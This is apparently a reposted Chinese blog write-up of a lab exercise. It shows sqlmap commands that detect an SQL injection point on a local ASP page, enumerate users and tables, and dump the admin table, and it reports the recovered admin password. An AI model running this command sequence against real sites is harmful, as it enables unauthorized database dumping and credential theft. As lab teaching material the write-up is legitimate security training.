美文网首页
Sqlmap数据库注入攻击

Sqlmap数据库注入攻击

作者: 糖no1 | 来源:发表于2018-11-19 16:17 被阅读0次

(利用sqlmap命令破解出access数据中的admin的密码bfpns)

在kali中打开终端,在终端中输入命令“sqlmap –u http://192.168.1.3:8008/onews.asp?id=45”(实验的id),参数-u扫描注入点扫描目标主机,检测出的信息准确。

“sqlmap –u http://192.168.1.3:8008/onews.asp?id=45 --users”获取到用户名

“sqlmap –u http://192.168.1.3:8008/onews.asp?id=45 -–dump –tables”探测数据库和表信息

显示探测出来的字段信息 针对admin表探测出的结构

” sqlmap -u "http://192.168.1.3:8008/onews.asp?id=45" --dump -T admin -C admin,password”,进行暴库,获得用户名和密码

已经猜解出来用户名为admin 已经猜解出来密码为bfpns

相关文章

  • Sqlmap数据库注入攻击

    (利用sqlmap命令破解出access数据中的admin的密码bfpns) 在kali中打开终端,在终端中输入命...

  • sqlmap从入门到精通-第四章-4-8 sqlmap数据库拖库

    4.8 sqlmap数据库拖库攻击与防范 4.8.1 sqlmap数据库拖库攻击简介 1.拖库简介 原因是由于早年...

  • 8.6 漏洞利用

    8.6.1. 数据库注入 SQLMap bbqsql 8.6.2. 非结构化数据库注入 NoSQLAttack N...

  • sqlmap使用流程,常用语句

    一、简单的sqlmap注入流程 1.读取数据库版本,当前用户,当前数据库 sqlmap -u http://www...

  • Sqlmap

    sqlmap,py -u "URL"检测是否可注入 sqlmap.py -u"URL"--dbs查看存在数据库 s...

  • sqlmap使用

    环境准备: 假设存在sql注入的url是 一、基于mysql注入 a、sqlmap注入爆数据库 如下图显示,即爆出...

  • 一些神奇的代码

    sqlmap.py -u url 验证是否为注入点sqlmap.py -u url --dbs 列出数据库系统的数...

  • 三、sqlmap的使用--sql注入

    1、 【sqlmap -u "url"】 -u:检测是否存在注入,返回数据库的名字 ...

  • MyBatis 防止sql注入攻击

    Sql注入攻击 SQL注入攻击属于[数据库安全]攻击手段之一,可以通过[数据库安全]防护技术实现有效防护,数据库安...

  • sqlmap介绍与使用案例

    1.sqlmap简介 最白话的介绍就是sqlmap是一个工具,一个用来做sql注入攻击的工具 2.windows安...

网友评论

      本文标题:Sqlmap数据库注入攻击

      本文链接:https://www.haomeiwen.com/subject/ferafqtx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|Sqlmap数据库注入攻击|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!